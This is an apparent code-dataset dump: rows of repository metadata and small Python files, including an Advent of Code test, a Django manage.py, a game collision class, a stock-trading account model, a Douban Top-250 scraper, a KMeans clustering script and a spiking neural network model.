blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
36d7aaf1239c27b5a144870cda82fb54a646e143 | 50ea96a7b912789185b9e51c97b780ce5b3e1511 | /Tests/test_XmasHacker.py | a8e0afc51191f98936ebd05065081bc8c6589354 | [] | no_license | valies/AoC2020 | d5b88938a5370cbe0f1cf36d233b3073286ca155 | 1c47b0d796e0accb7d5bc4f2259a13194a2ecdd2 | refs/heads/master | 2023-03-20T10:25:59.925044 | 2021-03-13T13:59:21 | 2021-03-13T13:59:21 | 318,211,147 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 621 | py | import unittest
from Day9.xmasHacker import XmasHacker
class TestXmasHacker(unittest.TestCase):
    """Tests for the Day 9 XMAS-cipher solver using the puzzle's sample stream."""
    # Sample number stream from the Day 9 puzzle statement; preamble size is 5.
    SAMPLE = [35, 20, 15, 25, 47, 40, 62, 55, 65, 95, 102, 117, 150, 182, 127, 219, 299, 277, 309, 576]
    def test_xmas_hacker_part1(self):
        """Part 1: find the first value that breaks the XMAS property."""
        self.assertEqual(XmasHacker.find_culprit_part1(list(self.SAMPLE), 5), 127, "Should be the same.")
    def test_xmas_hacker_part2(self):
        """Part 2: find the encryption weakness derived from the culprit."""
        self.assertEqual(XmasHacker.find_sum_part2(list(self.SAMPLE), 5), 62, "Should be the same.")
| [
"da_valies@hotmail.com"
] | da_valies@hotmail.com |
d8611bb01cbb911f726ce7d79586778f290e47ee | f5a002ae3b12a750fa3c777e8ce239677d0f8db5 | /gst_reports/models.py | 88b3a5117472965d2aa359f1c95d926b75f0228f | [] | no_license | abhishek-ag2000/working123 | f217911c6f54091b6412f1bf7e594998cab5cbda | e9e07d98011a4db812d06e50de4063e305dbc1d9 | refs/heads/master | 2022-12-14T03:54:54.064379 | 2019-09-14T14:10:58 | 2019-09-14T14:10:58 | 188,194,278 | 0 | 0 | null | 2022-12-08T05:21:08 | 2019-05-23T08:37:53 | JavaScript | UTF-8 | Python | false | false | 18 | py | """
Models
"""
| [
"abhishek.ag2000@gmail.com"
] | abhishek.ag2000@gmail.com |
96fea94e22cbfaaf30129754654274287d356dc6 | e1015c6a022d3c7c631262076b81f422e04b97f1 | /manage.py | dfb727b7f679d970d1dadbe86e976ccf78468678 | [] | no_license | mikaeltheimer/mdq_api | aa9e9a7286c881319b2e526550782e41755cace9 | 8ed7eaa4acf8592e996b6f02523e8a599b81f5f4 | refs/heads/master | 2021-01-20T03:40:24.636280 | 2014-06-22T01:27:54 | 2014-06-22T01:27:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 246 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
    # Point Django at this project's settings unless the caller already set it.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "mdq.settings")
    # Imported after the env var is set (standard Django manage.py pattern).
    from django.core.management import execute_from_command_line
    execute_from_command_line(sys.argv)
| [
"me@hownowstephen.com"
] | me@hownowstephen.com |
40a96d6da20ca24cb48bf2ecfa5d1d8e91736e5c | 787ca5f82814a58c63cf3d8c0ec02082c40420de | /sbfury/golpe.py | 44f94c69909c812085dd0cff319e7226e67c4fad | [] | no_license | hugoruscitti/sbfury | 72e586354b7cb88532bcfbe5705a66b1008710cb | 474ce8304c45e63214184cde50f2976724fd8455 | refs/heads/master | 2020-06-29T19:03:25.284388 | 2013-01-02T04:15:09 | 2013-01-02T04:15:09 | 4,811,263 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,851 | py | # -*- encoding: utf-8 -*-
# Shaolin's Blind Fury
#
# Copyright: Hugo Ruscitti
# Web: www.losersjuegos.com.ar
import pilas
from configuracion import DEPURACION
import efecto_golpe
import random
class Golpe(pilas.actores.Actor):
    """Represents an (invisible) hit that one actor throws at another."""
    def __init__(self, actor, enemigos, dx, dy):
        """Create the hit point.

        actor -- the actor throwing the punch.
        enemigos -- iterable of enemies that can be struck.
        dx, dy -- offset of the hit point relative to the actor.
        """
        pilas.actores.Actor.__init__(self)
        # Sprite only actually drawn when DEPURACION (debug mode) is enabled.
        self.imagen = 'colision.png'
        self.actor = actor
        self.dx = dx
        self.dy = dy
        self.enemigos = enemigos
        self.actualizar()
    def actualizar(self):
        """Reposition the hit point 70px in front of the actor each frame."""
        if self.actor.espejado:
            # Actor is mirrored (facing left): place the hit to the left.
            self.x = self.actor.x - 70 - self.dx
        else:
            self.x = self.actor.x + 70 + self.dx
        self.y = self.actor.y + self.actor.altura_del_salto + self.dy
    def verificar_colisiones(self):
        """Return the first enemy struck by this hit, or None if nobody was."""
        for enemigo in self.enemigos:
            # Hit box of the enemy, shrunk 10px on each horizontal side.
            area = [
                enemigo.izquierda + 10,
                enemigo.derecha - 10,
                enemigo.abajo,
                enemigo.arriba,
            ]
            if enemigo.puede_ser_golpeado:
                # Box-vs-point collision test, horizontal and vertical.
                if area[0] < self.x < area[1] and area[2] < self.y < area[3]:
                    # Check both actors are roughly on the same z plane.
                    if abs(enemigo.y - self.actor.y) < 15:
                        if enemigo.altura_del_salto < 80:
                            self.crear_efecto_de_golpe()
                            return enemigo
    def dibujar(self, aplicacion):
        """Draw the hit sprite only when the debug flag is enabled."""
        if DEPURACION:
            pilas.actores.Actor.dibujar(self, aplicacion)
    def crear_efecto_de_golpe(self):
        """Spawn a small impact effect at a slightly randomized position."""
        dx = random.randint(-10, 10)
        dy = random.randint(-10, 10)
        efecto_golpe.EfectoGolpe(self.x + dx, self.y + dy)
| [
"hugoruscitti@gmail.com"
] | hugoruscitti@gmail.com |
4d481472bad08829b53f8d4c2d484a12c46618e7 | 27e691f8af9d023105feb57260ab5353b2cf10b7 | /model/account.py | 2e10a81b4c0e78eb9075c6f2faa4e3b4ab638010 | [] | no_license | Ssawalha/Deployable-TTrader | 8e9a617c4e09b6aa229270c99ad809b0f7743da1 | b7bba5b6ab596f8b2a9bc8cb1b7730850ade311a | refs/heads/master | 2020-06-24T04:36:32.847363 | 2019-08-13T19:50:52 | 2019-08-13T19:50:52 | 198,851,228 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,820 | py | import sqlite3
from time import time
from collections import OrderedDict
from model.orm import ORM
from model import util
from model import position as p
from model import trade as t
from random import randint
class Account(ORM):
    """A user account: login credentials, cash balance, positions and trades.

    Persisted through the ORM base class into the ``accounts`` table.
    """

    tablename = "accounts"
    fields = ["username", "password_hash", "balance", "api_key", "first", "last"]
    # NOTE: the original DDL ended the column list with a trailing comma
    # ("UNIQUE(api_key)," before ");"), which is invalid SQLite syntax and
    # would make CREATE TABLE fail; the comma is removed here.
    createsql = '''CREATE TABLE {} (
    pk INTEGER PRIMARY KEY AUTOINCREMENT,
    username VARCHAR NOT NULL,
    password_hash TEXT,
    balance FLOAT,
    first VARCHAR,
    last VARCHAR,
    api_key VARCHAR(256),
    UNIQUE(username),
    UNIQUE(api_key)
    );'''.format(tablename)

    def __init__(self, **kwargs):
        """Populate self.values from keyword arguments.

        An OrderedDict is used because the field order matters to the ORM;
        missing fields default to None.
        """
        self.values = OrderedDict()
        for key in ('pk', 'username', 'password_hash', 'balance',
                    'first', 'last', 'api_key'):
            self.values[key] = kwargs.get(key)

    def __repr__(self):
        msg = '<Account pk:{pk}, username:{username}, password_hash:{password_hash}, balance:{balance}, first:{first}, last:{last}, api_key:{api_key}>'
        return msg.format(**self.values)

    def json(self):
        """Return a plain-dict snapshot of all persisted fields."""
        return dict(self.values)

    @classmethod
    def api_authenticate(cls, api_key):
        """Return the account owning `api_key`, or None if it is unknown."""
        return cls.one_from_where_clause("WHERE api_key = ?", (api_key,))

    def generate_api_key(self):
        """Assign a random numeric API key and persist it immediately.

        NOTE(review): random.randint is not cryptographically secure; the
        `secrets` module would be preferable for auth tokens -- kept as-is to
        preserve existing key format.
        """
        self.values['api_key'] = str(randint(1000000000000000000, 99999999999999999999))
        self.save()

    def set_password(self, password):
        """Store only the hash of `password`, never the plain text."""
        self.values['password_hash'] = util.hash_password(password)

    @classmethod
    def login(cls, username, password):
        """Check credentials against the accounts table.

        Returns the matching Account instance on success, None otherwise.
        """
        if util.check_password(username, password):
            return cls.one_from_where_clause("WHERE username = ?", (username,))
        return None

    def get_positions(self):
        """Return all Position rows belonging to this user."""
        return p.Position.all_with_username(self.values['username'])

    def get_position_for(self, ticker):
        """Return the user's Position for `ticker`.

        If the position does not exist, return a new (unsaved) Position with
        zero shares.
        """
        ticker = ticker.lower()
        position = p.Position.one_from_where_clause(
            "WHERE ticker =? AND username =?", (ticker, self.values['username']))
        if position is None:
            return p.Position(username=self.values['username'], ticker=ticker, shares=0)
        return position

    def get_trades(self):
        """Return all of the user's trades as Trade objects."""
        return t.Trade.all_with_username(self.values['username'])

    def trades_for(self, ticker):
        """Return all of the user's trades for the given ticker."""
        ticker = ticker.lower()
        return t.Trade.all_from_where_clause(
            "WHERE ticker =? AND username =?", (ticker, self.values['username']))

    def _price_for(self, ticker):
        """Current price of `ticker`; raises KeyError when the lookup fails
        (nonexistent stock).  Narrow helper so buy/sell no longer convert
        every error -- including ValueError -- into KeyError."""
        try:
            return util.lookup_price(ticker)
        except Exception:
            raise KeyError(ticker)

    def buy(self, ticker, amount):
        """Buy `amount` shares of `ticker`.

        Raises KeyError for a nonexistent stock and ValueError for
        insufficient funds (the original code caught everything and re-raised
        KeyError, contradicting this documented contract).  Creates a Trade,
        updates the Position and debits the balance.  Returns nothing.
        """
        ticker = ticker.lower()
        amount = int(amount)
        price = self._price_for(ticker)
        cost = price * amount
        if cost > self.values['balance']:
            raise ValueError("insufficient funds")
        self.values['balance'] -= cost
        self.save()
        t.Trade(buy_sell='Buy', username=self.values['username'],
                ticker=ticker, price=price,
                shares=amount, time=time()).save()
        position = self.get_position_for(ticker)
        position.values['shares'] += amount
        position.save()

    def sell(self, ticker, amount):
        """Sell `amount` shares of `ticker`.

        Raises KeyError when the price lookup fails and ValueError for
        insufficient shares (previously every failure surfaced as KeyError).
        Creates a Trade, updates the Position and credits the balance.
        """
        ticker = ticker.lower()
        amount = int(amount)
        price = self._price_for(ticker)
        position = self.get_position_for(ticker)
        if position.values['shares'] < amount:
            raise ValueError("insufficient shares")
        position.values['shares'] -= amount
        position.save()
        t.Trade(buy_sell='Sell', username=self.values['username'],
                ticker=ticker, price=price,
                shares=amount, time=time()).save()
        self.values['balance'] += price * amount
        self.update_row()

    def ticker_buy_lst(self, ticker):
        """Return the user's 'Buy' trades for `ticker`."""
        return [tr for tr in self.trades_for(ticker)
                if tr.values['buy_sell'] == 'Buy']

    def ticker_sell_lst(self, ticker):
        """Return the user's 'Sell' trades for `ticker`."""
        return [tr for tr in self.trades_for(ticker)
                if tr.values['buy_sell'] == 'Sell']

    def buy_market_value(self, ticker):
        """Total money spent buying `ticker` (shares * price, summed)."""
        return sum(tr.values['shares'] * tr.values['price']
                   for tr in self.ticker_buy_lst(ticker))

    def buy_trade_volume(self, ticker):
        """Total number of shares of `ticker` ever bought."""
        return sum(tr.values['shares'] for tr in self.ticker_buy_lst(ticker))

    def sell_market_value(self, ticker):
        """Total money received selling `ticker` (shares * price, summed)."""
        return sum(tr.values['shares'] * tr.values['price']
                   for tr in self.ticker_sell_lst(ticker))

    def sell_trade_volume(self, ticker):
        """Total number of shares of `ticker` ever sold."""
        return sum(tr.values['shares'] for tr in self.ticker_sell_lst(ticker))

    def profit_loss(self, ticker):
        """Realized plus unrealized profit/loss for `ticker`.

        Realized P/L is sell proceeds minus buy cost; any shares still held
        (net volume > 0) are valued at the current market price.
        """
        net_value = self.sell_market_value(ticker) - self.buy_market_value(ticker)
        net_volume = self.buy_trade_volume(ticker) - self.sell_trade_volume(ticker)
        if net_volume > 0:
            return net_value + net_volume * util.lookup_price(ticker)
        return net_value
"sami_sawalha@hotmail.com"
] | sami_sawalha@hotmail.com |
b4df791f6b5714998c3eed2619b3569d1db70e59 | 865d120bfe9ee0cc3474ae5c5ddd68992c60ef91 | /test_args.py | 0bb04f3408c68a3f8779e347ed7a29c70064b05a | [] | no_license | JiangWeiFanAI/High-resolution-seasonal-climate-forecast_v1_csiro | 6462ba540ab908f915c0213033b7a34f262680bc | e282092f427069817187d10a750a6a8cf2c1ea88 | refs/heads/master | 2020-11-28T02:33:05.006899 | 2020-03-10T08:14:11 | 2020-03-10T08:14:11 | 229,681,561 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,409 | py | import os
import data_processing_tool as dpt
from datetime import timedelta, date, datetime
from args_parameter import args
from PrepareData import ACCESS_BARRA_v1,ACCESS_BARRA_v2
import torch,os,torchvision
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import matplotlib.pyplot as plt
from torch.utils.data import DataLoader,random_split
from torchvision import datasets, models, transforms
import torch.nn as nn
import torch.optim as optim
# from PIL import Image
import time
import model
import utility
from tqdm import tqdm
import math
import xarray as xr
from skimage.measure import compare_ssim
from skimage.measure import compare_psnr,compare_mse
import platform
# Per-platform data locations and experiment date range.
# NOTE(review): the variable `sys` shadows the `sys` module name -- it holds
# the platform.system() string from here on.
sys = platform.system()
init_date=date(1970, 1, 1)
start_date=date(1990, 1, 2)
end_date=date(2012,12,25)
if sys == "Windows":
    # Local development machine: shorter date range, local drives.
    args.file_ACCESS_dir="H:/climate/access-s1/"
    args.file_BARRA_dir="D:/dataset/accum_prcp/"
    init_date=date(1970, 1, 1)
    start_date=date(1990, 1, 2)
    end_date=date(1990,12,25)
else:
    # Cluster paths (NCI /g/data project shares).
    args.file_ACCESS_dir_pr="/g/data/ub7/access-s1/hc/raw_model/atmos/pr/daily/"
    args.file_ACCESS_dir="/g/data/ub7/access-s1/hc/raw_model/atmos/"
# training_name="temp01"
    args.file_BARRA_dir="/g/data/ma05/BARRA_R/v1/forecast/spec/accum_prcp/"
# One input channel per enabled atmospheric variable flag.
args.channels=0
if args.pr:
    args.channels+=1
if args.zg:
    args.channels+=1
if args.psl:
    args.channels+=1
if args.tasmax:
    args.channels+=1
if args.tasmin:
    args.channels+=1
# Mean value scaled by 86400 -- presumably converting a per-second mean to a
# per-day total; confirm units against the dataset docs.
access_rgb_mean= 2.9067910245780248e-05*86400
leading_time=217
args.leading_time_we_use=7
args.ensemble=2
# Summary banner of the run configuration (typos in strings left untouched).
print("training statistics:")
print("  ------------------------------")
print("  trainning name  |  %s"%args.train_name)
print("  ------------------------------")
print("  num of channels  |  %5d"%args.channels)
print("  ------------------------------")
print("  num of threads  |  %5d"%args.n_threads)
print("  ------------------------------")
print("  batch_size  |  %5d"%args.batch_size)
print("  ------------------------------")
print("  using cpu only?  |  %5d"%args.cpu)
def main():
    """Smoke-test the checkpoint/logging utilities for one dummy batch."""
    start=time.time()
    checkpoint = utility.checkpoint(args)
    checkpoint.my_write_log("Let's use"+str(torch.cuda.device_count())+"GPUs!")
    checkpoint.my_write_log("start")
    batch=1
    # NOTE(review): start - time.time() is zero or negative here; the message
    # reads like it should be time.time() - start -- confirm the intent.
    checkpoint.my_write_log("Train for batch %d,data loading time cost %f s"%(batch,start-time.time()))
if __name__=='__main__':
    main()
| [
"45549842+JiangWeiFanAI@users.noreply.github.com"
] | 45549842+JiangWeiFanAI@users.noreply.github.com |
39adda87b74dd84e828aa911f336be7f59c02608 | dadafb6eb3d56cf3d9dc8f5ed96ae9bb32a3b465 | /PythonStudy/FirstPythonPro/douban_movie.py | 8367f3d17536d63fae19eebd652de07da28fb34a | [] | no_license | FLShan/DataAnalysis | 75049dba02419f8fc30e78b8a29c7af41672dcc5 | 19073432e73bff529f2f44b47cfbfdd6a70ae921 | refs/heads/master | 2021-05-12T06:11:41.188300 | 2019-03-27T09:48:00 | 2019-03-27T09:48:00 | 117,212,640 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,396 | py | # !/usr/bin/env python
# encoding=utf-8
import requests
import re
import codecs
from bs4 import BeautifulSoup
from openpyxl import Workbook
# Workbook that receives the scraped data; main() saves it as 电影.xlsx.
wb = Workbook()
dest_filename = '电影.xlsx'
ws1 = wb.active
ws1.title = "电影top250"
# Entry page of the Douban Top-250 chart; get_li() joins the relative
# next-page links onto this base URL.
DOWNLOAD_URL = 'http://movie.douban.com/top250/'
def download_page(url):
    """Fetch *url* with a desktop browser User-Agent and return the raw body."""
    ua = ('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) '
          'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36')
    return requests.get(url, headers={'User-Agent': ua}).content
def get_li(doc):
    """Parse one Top-250 listing page.

    Returns (names, star_counts, scores, quotes, next_url) where next_url is
    the absolute URL of the following page, or None on the last page.
    """
    soup = BeautifulSoup(doc, 'html.parser')
    ol = soup.find('ol', class_='grid_view')
    name = []  # movie titles
    star_con = []  # "N people rated" strings
    score = []  # numeric rating strings
    info_list = []  # one-line quotes
    for i in ol.find_all('li'):
        detail = i.find('div', attrs={'class': 'hd'})
        movie_name = detail.find(
            'span', attrs={'class': 'title'}).get_text()
        level_star = i.find(
            'span', attrs={'class': 'rating_num'}).get_text()  # rating score
        star = i.find('div', attrs={'class': 'star'})
        # The regex matches the Chinese word for "rated" in "N people rated".
        star_num = star.find(text=re.compile('评价'))
        info = i.find('span', attrs={'class': 'inq'})  # one-line quote
        if info:  # some movies have no quote; store a placeholder instead
            info_list.append(info.get_text())
        else:
            info_list.append('无')
        score.append(level_star)
        name.append(movie_name)
        star_con.append(star_num)
    # "next page" link; absent on the final page.
    page = soup.find('span', attrs={'class': 'next'}).find('a')
    if page:
        return name, star_con, score, info_list, DOWNLOAD_URL + page['href']
    return name, star_con, score, info_list, None
def main():
    """Crawl every Top-250 page, then write one worksheet row per movie."""
    url = DOWNLOAD_URL
    name = []
    star_con = []
    score = []
    info = []
    # Follow the pagination chain until get_li() returns None for the URL.
    while url:
        doc = download_page(url)
        movie, star, level_num, info_list, url = get_li(doc)
        name = name + movie
        star_con = star_con + star
        score = score + level_num
        info = info + info_list
    # Use enumerate instead of name.index(i): index() returns the FIRST
    # occurrence, so duplicate titles all wrote to the same row (and each
    # lookup was O(n)).  Rows are 1-based in openpyxl cell references.
    for row, (movie, stars, level, quote) in enumerate(
            zip(name, star_con, score, info), start=1):
        ws1['A%s' % row] = movie
        ws1['B%s' % row] = stars
        ws1['C%s' % row] = level
        ws1['D%s' % row] = quote
    wb.save(filename=dest_filename)
if __name__ == '__main__':
    main()
"shanfangliang@163.com"
] | shanfangliang@163.com |
8e6f2005191fbcdb014cc5df3403ff2e8328714a | 9ff63b122f833b498529a6d85afda3615fc620eb | /BOJ/15921.py | 89d87631383cda1f561a7f6eb28e28a4c9d526ae | [] | no_license | jang010505/Algorithm | 7bbb9f1a5c087a3ac53b9a02e6b633aa81ec1a29 | 3442a492284decfdd3a727fc5fe9cfd9471096be | refs/heads/master | 2023-03-14T02:19:36.255303 | 2021-03-04T15:07:02 | 2021-03-04T15:07:02 | 299,441,113 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 65 | py | n=int(input())
if n: print("1.00")
else: print("divide by zero")
| [
"noreply@github.com"
] | jang010505.noreply@github.com |
b712ff46278675d218e9efd11213d97ab19c4e89 | be028671344cce87c0cea4a1f839c68eccb330f4 | /scrapy/who/who_surname_processor.py | 5adea363d0fbffb81c1e3b70dc6cd67a770a69d3 | [] | no_license | taylor3lewis/kipling | 7b3046fba752f4e8d6e41953357a64da18b704c1 | d5b8e789a1fcc6825e8b973fc0d70ee8fbd7b03a | refs/heads/master | 2020-04-07T01:17:37.314470 | 2018-11-21T20:19:02 | 2018-11-21T20:19:02 | 157,937,218 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 503 | py | # coding: utf-8
from glob import glob
# Python 2 script (note the statement-form "print f" below): merges every
# data/SOBRENOME* word list into a generated who.py module.
lines = []
for f in glob('data/SOBRENOME*'):
    print f
    fl = open(f, 'r')
    lines += fl.readlines()
    fl.close()
# Emit who.py containing one dict literal mapping each unique surname to None
# (presumably consumed for fast membership tests -- confirm against who.py's
# users).
py_file = open('who.py', 'w')
py_file.write('# coding: utf-8\n')
py_file.write('SURNAMES = {')
buff = ''
unique = set()
for line in lines:
    line = line.strip('\n')
    if line not in unique:
        unique.add(line.strip('\n'))
        buff += 'u"%s":None,' % line.strip('\n')
# Drop the trailing comma before closing the dict literal.
py_file.write(buff[:-1])
py_file.write('}')
py_file.close()
| [
"taylor3lewis@gmail.com"
] | taylor3lewis@gmail.com |
1768c1f480715adfacad2c6422c0cffce728714a | 596d151b6fb6b58595d3d99f13685b3a12465a7c | /01 第一周 机器学习之无监督学习/单元1 聚类/02 KMeans/消费水平(KMeans).py | eb752661e94404827fe8969388bbd4181df8829e | [] | no_license | git-zzf/PythonMachineLearning | 9ce54558f0d24525c07024cc7731eeac316482b8 | 7aae13583d97498081caa459b1c1e387784af8c5 | refs/heads/master | 2022-04-24T15:51:40.830970 | 2020-04-29T05:42:00 | 2020-04-29T05:42:00 | 258,816,292 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,546 | py | import numpy as np
from sklearn.cluster import KMeans
path = r"E:/Notes/PythonMachineLearning/01 第一周 机器学习之无监督学习/单元1 聚类/01 全国31省消费水平/31省市居民家庭消费水平-city.txt"
def loadData(filePath):
    """Read the per-city consumption table.

    Each line looks like "city,v1,v2,...": the first comma-separated field is
    the city name and the remaining fields are numeric consumption figures.

    Returns (retData, retCityName): a list of float rows and the parallel
    list of city names.
    """
    retData = []      # numeric consumption values, one row per city
    retCityName = []  # city names, same order as retData
    # Open read-only ('r' instead of the original 'r+': nothing is written)
    # inside a context manager so the handle is always closed -- the original
    # never closed the file.
    with open(filePath, 'r') as fr:
        for line in fr:
            items = line.strip().split(",")  # fields are comma separated
            retCityName.append(items[0])     # first field is the city name
            retData.append([float(items[i]) for i in range(1, len(items))])
    return retData, retCityName
if __name__ == '__main__':
    data,cityName = loadData(path) # load the dataset
    km = KMeans(n_clusters = 4) # build a KMeans estimator with 4 clusters
    label = km.fit_predict(data) # fit + predict: cluster index (0-3) per city
    expenses = np.sum(km.cluster_centers_, axis=1) # total of the 8 expense categories at each cluster centre, used for display
    CityCluster = [[], [], [], []] # one bucket of city names per cluster
    for i in range(len(cityName)):
        CityCluster[label[i]].append(cityName[i]) # put each city into its cluster's bucket
    for i in range(len(CityCluster)): # print each cluster's expense total and its cities
        print("Expenses:%.2f" % expenses[i])
        print(CityCluster[i])
| [
"hfxxwilliam@gamil.com"
] | hfxxwilliam@gamil.com |
90990c832821edc13bd914233d448ee7c9f16b46 | cb3db5736ee11832572dc1c2243383e595f7ffd1 | /src/experiments/final_spiking_loo_wta_mean.py | de7e316d2c725760d9a3ef45041b832268d75fef | [
"MIT"
] | permissive | GustavEye/spiking-radar-gestures | 7c5c473cabad483860727cd4002eefd1912822a4 | a0fe738245a42596e5828a16244342699980ac46 | refs/heads/main | 2023-09-03T21:22:25.459739 | 2021-11-08T10:09:30 | 2021-11-08T10:09:30 | 425,784,173 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,151 | py | import tensorflow as tf
from tensorboard.plugins.hparams import api as hp
from src.neuron_models import wta_layer, lif_neuron
# Hyper-parameter "search space" logged to TensorBoard's HParams plugin.
# Each Discrete([...]) currently holds a single value, i.e. one fixed
# configuration per run.
HPARAMS = [
    hp.HParam('pool_size', hp.Discrete([4])),
    hp.HParam('wta_threshold', hp.Discrete([0.05])),
    hp.HParam('n_neurons_1', hp.Discrete([75])),
    hp.HParam('dropout_1', hp.Discrete([0.3])),
    hp.HParam('dropout_2', hp.Discrete([0.0])),
    hp.HParam('decay_train_mode', hp.Discrete([1])),
    hp.HParam('threshold_train_mode', hp.Discrete([1])),
    hp.HParam('seed', hp.Discrete([1211]))
]
# Metrics picked up from the Keras epoch logs (train/validation groups) plus
# custom summary scalars written elsewhere by the experiment runner.
METRICS = [
    hp.Metric("epoch_sparse_categorical_accuracy", group="train", display_name="accuracy (train)",),
    hp.Metric("epoch_loss", group="train", display_name="loss (train)",),
    hp.Metric("epoch_sparse_categorical_accuracy", group="validation", display_name="accuracy (val.)",),
    hp.Metric("epoch_loss", group="validation", display_name="loss (val.)",),
    hp.Metric("info_n_trainable", display_name="n_trainable",),
    hp.Metric("best_val", display_name="best_val",),
    hp.Metric("best_val_arg", display_name="best_val_arg",),
]
def create_model(shape_in, n_out, hparams):
    """Build and compile the spiking WTA/LIF gesture classifier.

    shape_in -- input shape without the batch axis; the first axis is kept
        through the Reshape below, so it is treated as the time dimension.
        # assumes (time, ..., features) ordering -- TODO confirm
    n_out -- number of output classes.
    hparams -- mapping with the keys used below (pool_size, dropout_1,
        n_neurons_1, decay_train_mode, threshold_train_mode).
        # NOTE(review): 'dropout_2' and 'wta_threshold' from HPARAMS are not
        # used in this function.
    """
    tau_v = 10.0  # time constant handed to the recurrent LIF layer
    inputs = tf.keras.layers.Input(shape=shape_in)
    # Pool only along the last axis, apply the winner-take-all mean layer,
    # then flatten everything except the leading (time) axis.
    mid = tf.keras.layers.MaxPooling3D(pool_size=(1,1,hparams['pool_size']))(inputs)
    mid = wta_layer.WTA_mean()(mid)
    mid = tf.keras.layers.Reshape((shape_in[0], -1))(mid)
    mid = tf.keras.layers.Dropout(hparams['dropout_1'])(mid)
    # Recurrent LIF cell returns a pair -- presumably (spikes, membrane
    # potential); confirm against lif_neuron. Full sequence is kept.
    mid_z, v = tf.keras.layers.RNN(lif_neuron.RecurrentLifNeuronCell(
        hparams['n_neurons_1'],
        decay_train_mode=hparams['decay_train_mode'],
        threshold_train_mode=hparams['threshold_train_mode'],
        tau=tau_v,
    ), return_sequences=True, name='LIF_recurrent_01')(mid)
    # Non-spiking output cell; only the final timestep is returned.
    out_z, v = tf.keras.layers.RNN(lif_neuron.LiNeuronCell(
        n_out,
    ), return_sequences=False, name='out')(mid_z)
    model = tf.keras.Model(inputs=inputs, outputs=[out_z])
    model.compile(
        loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=False),
        optimizer="adam",
        metrics=["sparse_categorical_accuracy"],
        run_eagerly=False
    )
    return model
"daniel.auge@tum.de"
] | daniel.auge@tum.de |
cc0c7f3391c999eb34f4a93e7b664773a4712134 | 63037550c61b1b779c6e79a94722d130565789b8 | /src/main.py | 40acb63ee12fc08859f7b091fbc1ded8397e5d23 | [
"MIT"
] | permissive | Kei198403/python-template | 598ec31fe1038d5996442568ac12aa9887e9bee2 | 777427b0fddaadb5030a39a3445a7de53b232943 | refs/heads/main | 2023-04-22T14:24:53.911713 | 2021-05-07T13:18:47 | 2021-05-07T13:18:47 | 365,227,015 | 0 | 0 | null | 2021-05-07T13:18:47 | 2021-05-07T12:30:52 | Dockerfile | UTF-8 | Python | false | false | 152 | py | # -*- coding: utf-8 -*-
def sample() -> str:
    """Return the fixed placeholder string."""
    value = "hoge"
    return value


def main() -> None:
    """Program entry point: print a greeting."""
    greeting = "Hello Python"
    print(greeting)


if __name__ == "__main__":
    main()
| [
"74121135+Kei198403@users.noreply.github.com"
] | 74121135+Kei198403@users.noreply.github.com |
01509e3cb94f4932fe35bb4db8fbf15445461508 | 81eceea57d570fa1f9f6468875b1b06b8de9f0f0 | /.history/block_20200624172716.py | ca5c135349d1728a51d30bcf28a737626975d11e | [] | no_license | digg2414/python-blockchain | fe9cdab754123eddef660c39ffb4c0c6b0e99523 | 36c4df03bdd71dbd58663ee4b16f6a72f02d401f | refs/heads/master | 2022-11-05T01:08:44.229492 | 2020-06-24T23:11:41 | 2020-06-24T23:11:41 | 274,786,987 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 841 | py | import time
def mine_block(last_block, data):
    """
    Mine a block based on the last_block and the data.
    """
    # NOTE(review): work-in-progress snapshot (file lives under .history/) --
    # `times_stamp` is never defined, so calling mine_block raises NameError.
    times_stamp
class Block():
    """
    Block: a unit of storage.
    Store transactions in a blockchain that supports a cryptocurrency.
    """
    def __init__(self, timestamp, last_hash ,data, hash):
        # Fields stored verbatim; the `hash` parameter shadows the builtin.
        self.data = data
        self.timestamp = timestamp
        self.last_hash = last_hash
        self.hash = hash
    def __repr__(self):
        # NOTE(review): the rendered string opens with 'Block: (' but no
        # closing parenthesis is ever appended.
        return (
            'Block: ('
            f'timestamp: {self.timestamp}, '
            f'last_hash: {self.last_hash}, '
            f'hash: {self.hash}, '
            f'data: {self.data}'
        )
def main():
    # NOTE(review): Block.__init__ requires four arguments, so this call
    # raises TypeError at runtime -- another sign of an unfinished snapshot.
    block = Block('foo')
    print(block)
print(f'block.py __name__: {__name__}')
if __name__ == '__main__':
    main()
| [
"JHarold1241@outlook.com"
] | JHarold1241@outlook.com |
1cca9ab09d7162c952c43e3c5f2e899f5f790b69 | 75bcfd59fe9e3647d7e8b74115108710a122ff9c | /fixture/support.py | 0c5f43aa3e01d60db36c1160d274d3ed4a8a9805 | [
"Apache-2.0"
